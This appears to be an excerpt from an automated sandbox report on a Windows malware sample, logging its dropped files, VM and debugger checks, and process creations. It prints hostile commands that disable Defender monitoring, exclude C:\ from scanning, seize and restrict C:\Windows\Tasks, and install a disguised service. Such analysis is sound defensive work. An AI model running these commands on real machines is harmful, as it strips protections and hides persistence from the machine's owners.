                                  Source: C:\Windows\Bridgeprovider.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\fZypqYbb.log
                                  Source: C:\Windows\Bridgeprovider.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\vrXfSuSA.log
                                  Source: C:\Windows\Tasks\MSTask.exe - Dropped PE file which has not been started: C:\Windows\Temp\_MEI81722\select.pyd
                                  Source: C:\Windows\Tasks\MSTask.exe - Dropped PE file which has not been started: C:\Windows\Temp\_MEI81722\_ssl.pyd
                                  Source: C:\Windows\Tasks\MSTask.exe - Dropped PE file which has not been started: C:\Windows\Temp\_MEI81722\cryptography\hazmat\bindings\_rust.pyd
                                  Source: C:\Windows\Bridgeprovider.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\bjHzibbh.log
                                  Source: C:\Windows\Bridgeprovider.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\mFfXERcN.log
                                  Source: C:\Windows\Tasks\MSTask.exe - Dropped PE file which has not been started: C:\Windows\Temp\_MEI81722\_cffi_backend.cp38-win_amd64.pyd
                                  Source: C:\Windows\Bridgeprovider.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\OShKWlwM.log
                                  Source: C:\Windows\Tasks\Wmiic.exe - Evaded block: after key decision
                                  Source: C:\Windows\Tasks\Wmiic.exe - Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                  Source: C:\Windows\Tasks\Wrap.exe - Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                  Source: C:\ProgramData\migrate.exe - Evasive API call chain: GetLocalTime,DecisionNodes graph_26-23515
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exe - Evasive API call chain: GetLocalTime,DecisionNodes graph_0-23774
                                  Source: C:\Windows\Tasks\1.exe - Evasive API call chain: GetLocalTime,DecisionNodes
                                  Source: C:\Windows\Tasks\Wmiic.exe - Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_31-14914
                                  Source: C:\Windows\Tasks\MSTask.exe - Check user administrative privileges: GetTokenInformation,DecisionNodes
                                  Source: C:\Windows\Tasks\Wmiic.exe - API coverage: 4.6 %
                                  Source: C:\Windows\Tasks\Wmiic.exe - API coverage: 6.6 %
                                  Source: C:\Windows\Tasks\Wrap.exe - API coverage: 8.2 %
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7532 - Thread sleep time: -5534023222112862s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7756 - Thread sleep time: -1844674407370954s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7740 - Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8120 - Thread sleep count: 6414 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8148 - Thread sleep time: -3689348814741908s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8116 - Thread sleep count: 3387 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2056 - Thread sleep count: 8565 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2056 - Thread sleep count: 1144 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5344 - Thread sleep time: -1844674407370954s >= -30000s
                                  Source: C:\Windows\Tasks\IntelConfigService.exe TID: 7892 - Thread sleep count: 7109 > 30
                                  Source: C:\Windows\Tasks\IntelConfigService.exe TID: 7892 - Thread sleep time: -71090s >= -30000s
                                  Source: C:\Windows\Tasks\Superfetch.exe TID: 5000 - Thread sleep count: 8545 > 30
                                  Source: C:\Windows\Tasks\Superfetch.exe TID: 5000 - Thread sleep time: -85450s >= -30000s
                                  Source: C:\Windows\Bridgeprovider.exe TID: 7464 - Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\conhost.exe - Last function: Thread delayed
                                  Source: C:\Windows\Tasks\IntelConfigService.exe - Last function: Thread delayed
                                  Source: C:\Windows\Tasks\Superfetch.exe - Last function: Thread delayed
                                  Source: C:\Windows\Bridgeprovider.exe - File Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exe - Code function: 0_2_0087A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0087A69B
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exe - Code function: 0_2_0088C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0088C220
                                  Source: C:\ProgramData\migrate.exe - Code function: 26_2_0011A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,26_2_0011A69B
                                  Source: C:\ProgramData\migrate.exe - Code function: 26_2_0012C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,26_2_0012C220
                                  Source: C:\Windows\Tasks\Wrap.exe - Code function: 42_2_00007FF726D0C9E0 FindFirstFileExW,42_2_00007FF726D0C9E0
                                  Source: C:\Windows\Tasks\MSTask.exe - Code function: 56_2_00007FF7B1DA8110 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,56_2_00007FF7B1DA8110
                                  Source: C:\Windows\Tasks\MSTask.exe - Code function: 56_2_00007FF7B1D97B80 FindFirstFileExW,FindClose,56_2_00007FF7B1D97B80
                                  Source: C:\Windows\Tasks\MSTask.exe - Code function: 56_2_00007FF7B1DB20D4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,56_2_00007FF7B1DB20D4
                                  Source: C:\Windows\Tasks\1.exe - Code function: 60_2_003EA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,60_2_003EA69B
                                  Source: C:\Windows\Tasks\1.exe - Code function: 60_2_003FC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,60_2_003FC220
                                  Source: C:\Windows\Tasks\MSTask.exe - Code function: 62_2_00007FFDFB004462 _errno,malloc,_errno,memset,MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,free,_errno,FindFirstFileW,_errno,FindNextFileW,WideCharToMultiByte,62_2_00007FFDFB004462
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exe - Code function: 0_2_0088E6A3 VirtualQuery,GetSystemInfo,0_2_0088E6A3
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
                                  Source: C:\Windows\Bridgeprovider.exe - Thread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - File opened: C:\Users\user\AppData\Roaming
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - File opened: C:\Users\user
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - File opened: C:\Users\user\AppData\Roaming\Microsoft
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - File opened: C:\Users\user\AppData
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                                  Source: MSTask.exe, 00000038.00000003.1916985865.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
                                  Source: Superfetch.exe, 00000037.00000000.1913135865.00007FF6384E8000.00000002.00000001.01000000.0000000E.sdmp - Binary or memory string: AdditionsFacilityType_VBoxGuestDriverWWW
                                  Source: IYXE4Uz61k.exe, 00000000.00000003.1743680815.000000000315E000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: Superfetch.exe, 00000037.00000000.1913135865.00007FF6384E8000.00000002.00000001.01000000.0000000E.sdmp - Binary or memory string: !0R4AdditionsFacilityType_VBoxServiceWWW
                                  Source: migrate.exe, 0000001A.00000002.1869307386.0000000008BD4000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\%'
                                  Source: Superfetch.exe, 00000037.00000000.1913135865.00007FF6384E8000.00000002.00000001.01000000.0000000E.sdmp - Binary or memory string: AdditionsFacilityType_VBoxTrayClient
                                  Source: Superfetch.exe, 00000037.00000000.1913135865.00007FF6384E8000.00000002.00000001.01000000.0000000E.sdmp - Binary or memory string: aVmNetTx
                                  Source: Superfetch.exe, 00000037.00000000.1913135865.00007FF6384E8000.00000002.00000001.01000000.0000000E.sdmp - Binary or memory string: aVmNetRx
                                  Source: ApplicationsFrameHost.exe, 00000035.00000002.4148260496.0000020033241000.00000004.00000020.00020000.00000000.sdmp, ApplicationsFrameHost.exe, 00000035.00000002.4148260496.00000200331F8000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW
                                  Source: migrate.exe, 0000001A.00000002.1869307386.0000000008BD4000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}|'Y
                                  Source: MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exe - API call chain: ExitProcess graph end node graph_0-23965
                                  Source: C:\ProgramData\migrate.exe - API call chain: ExitProcess graph end node graph_26-23665
                                  Source: C:\Windows\Tasks\Wmiic.exe - API call chain: ExitProcess graph end node graph_31-14916
                                  Source: C:\Windows\Tasks\Wmiic.exe - API call chain: ExitProcess graph end node
                                  Source: C:\Windows\Tasks\1.exe - API call chain: ExitProcess graph end node
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Process information queried: ProcessInformation

Anti Debugging

Source: C:\Windows\Tasks\Wrap.exe Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep
Source: C:\Windows\Tasks\MSTask.exe Code function: 62_2_00007FFDFB0063AC 62_2_00007FFDFB0063AC
Source: C:\Windows\Tasks\MSTask.exe Code function: 62_2_00007FFDFB0064EC 62_2_00007FFDFB0064EC
Source: C:\Windows\Tasks\MSTask.exe Code function: 62_2_00007FFDFB0063AC rdtsc 62_2_00007FFDFB0063AC
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe Code function: 0_2_0088F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0088F838
Source: C:\Windows\Tasks\Wmiic.exe Code function: 31_2_0000000140023A88 LoadLibraryA,GetProcAddress,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 31_2_0000000140023A88
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe Code function: 0_2_00897DEE mov eax, dword ptr fs:[00000030h] 0_2_00897DEE
Source: C:\ProgramData\migrate.exe Code function: 26_2_00137DEE mov eax, dword ptr fs:[00000030h] 26_2_00137DEE
Source: C:\Windows\Tasks\1.exe Code function: 60_2_00407DEE mov eax, dword ptr fs:[00000030h] 60_2_00407DEE
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe Code function: 0_2_0089C030 GetProcessHeap, 0_2_0089C030
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\Tasks\MSTask.exe Process token adjusted: Debug
Source: C:\Windows\Tasks\MSTask.exe Process token adjusted: Debug
Source: C:\Windows\Bridgeprovider.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe Code function: 0_2_0088F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0088F838
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe Code function: 0_2_0088F9D5 SetUnhandledExceptionFilter, 0_2_0088F9D5
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe Code function: 0_2_0088FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0088FBCA
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe Code function: 0_2_00898EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00898EBD
Source: C:\ProgramData\migrate.exe Code function: 26_2_0012F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 26_2_0012F838
Source: C:\ProgramData\migrate.exe Code function: 26_2_0012F9D5 SetUnhandledExceptionFilter, 26_2_0012F9D5
Source: C:\ProgramData\migrate.exe Code function: 26_2_0012FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 26_2_0012FBCA
Source: C:\ProgramData\migrate.exe Code function: 26_2_00138EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 26_2_00138EBD
Source: C:\Windows\Tasks\Wmiic.exe Code function: 31_2_0000000140018800 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 31_2_0000000140018800
Source: C:\Windows\Tasks\Wmiic.exe Code function: 31_2_0000000140023D20 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 31_2_0000000140023D20
Source: C:\Windows\Tasks\Wmiic.exe Code function: 31_2_0000000140020180 SetUnhandledExceptionFilter, 31_2_0000000140020180
Source: C:\Windows\Tasks\Wmiic.exe Code function: 31_2_000000014001B6C4 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 31_2_000000014001B6C4
Source: C:\Windows\Tasks\Wmiic.exe Code function: 37_2_0000000140018800 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 37_2_0000000140018800
Source: C:\Windows\Tasks\Wmiic.exe Code function: 37_2_0000000140023D20 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 37_2_0000000140023D20
Source: C:\Windows\Tasks\Wmiic.exe Code function: 37_2_0000000140020180 SetUnhandledExceptionFilter, 37_2_0000000140020180
Source: C:\Windows\Tasks\Wmiic.exe Code function: 37_2_000000014001B6C4 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 37_2_000000014001B6C4
Source: C:\Windows\Tasks\Wrap.exe Code function: 42_2_00007FF726CF6FE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 42_2_00007FF726CF6FE0
Source: C:\Windows\Tasks\Wrap.exe Code function: 42_2_00007FF726CF7558 SetUnhandledExceptionFilter, 42_2_00007FF726CF7558
Source: C:\Windows\Tasks\Wrap.exe Code function: 42_2_00007FF726CF73B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 42_2_00007FF726CF73B0
Source: C:\Windows\Tasks\Wrap.exe Code function: 42_2_00007FF726CFE454 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 42_2_00007FF726CFE454
Source: C:\Windows\Tasks\MSTask.exe Code function: 56_2_00007FF7B1D9BA5C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 56_2_00007FF7B1D9BA5C
Source: C:\Windows\Tasks\MSTask.exe Code function: 56_2_00007FF7B1D9B1B0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 56_2_00007FF7B1D9B1B0
Source: C:\Windows\Tasks\MSTask.exe Code function: 56_2_00007FF7B1D9BC04 SetUnhandledExceptionFilter, 56_2_00007FF7B1D9BC04
Source: C:\Windows\Tasks\MSTask.exe Code function: 56_2_00007FF7B1DAAE98 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 56_2_00007FF7B1DAAE98
Source: C:\Windows\Tasks\1.exe Code function: 60_2_003FF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 60_2_003FF838
Source: C:\Windows\Tasks\1.exe Code function: 60_2_003FF9D5 SetUnhandledExceptionFilter, 60_2_003FF9D5
Source: C:\Windows\Tasks\1.exe Code function: 60_2_003FFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 60_2_003FFBCA
Source: C:\Windows\Tasks\1.exe Code function: 60_2_00408EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 60_2_00408EBD
Source: C:\Windows\Tasks\MSTask.exe Code function: 62_2_00007FFDFB004FDE __scrt_fastfail,IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 62_2_00007FFDFB004FDE
Source: C:\Windows\Bridgeprovider.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\IYXE4Uz61k.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath c:\
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -ExclusionPath c:\
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath c:\
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -ExclusionPath c:\
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $True
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $True
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $True
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $True
Source: C:\Windows\Tasks\Wmiic.exe Code function: 31_2_000000014000A180 GetProcessHeap,HeapAlloc,GetCommandLineW,_snwprintf_s,ShellExecuteExW,GetProcessHeap,HeapFree, 31_2_000000014000A180
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath c:\
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\programdata\ru.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K "c:\programdata\st.bat"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Superfetch.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\find.exe find /I /N "Superfetch.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\takeown.exe takeown /f c:\windows\tasks
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 3 /NOBREAK
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $True
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -ExclusionPath c:\
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "user:(R,REA,RA,RD)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "user:(R,REA,RA,RD)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 3 /NOBREAK
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\ProgramData\migrate.exe c:\programdata\migrate.exe -p4432
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 3 /NOBREAK
Source: C:\ProgramData\migrate.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\windows\tasks\run.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 1 /NOBREAK
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\Tasks\Wmiic.exe "C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 1 /NOBREAK
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\Tasks\Wmiic.exe "C:\windows\tasks\wmiic" start WMService
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 2 /NOBREAK
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\net.exe net start WMService
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\Tasks\1.exe "C:\windows\tasks\1.exe"
Source: C:\Windows\Tasks\Wrap.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Windows\Tasks\ApplicationsFrameHost.exe" --daemonized
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\Tasks /deny "user-PC$:(R,REA,RA,RD)"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\Tasks\ApplicationsFrameHost.exe C:\Windows\Tasks\ApplicationsFrameHost.exe --daemonized
Source: C:\Windows\Tasks\MSTask.exe Process created: C:\Windows\Tasks\MSTask.exe C:\Windows\Tasks\MSTask.exe
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 start WMService
Source: C:\Windows\Tasks\1.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Windows\mJTDsOcOsyMzGWVl2p4lWXwUrl0TR0B.vbe"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\fwJLoWFGhpY.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\Bridgeprovider.exe "C:\Windows/Bridgeprovider.exe"
Source: C:\Windows\Bridgeprovider.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.cmdline"
Source: C:\Windows\Bridgeprovider.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: unknown unknown
Source: C:\Windows\Tasks\Wmiic.exe Code function: 31_2_000000014000A050 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 31_2_000000014000A050
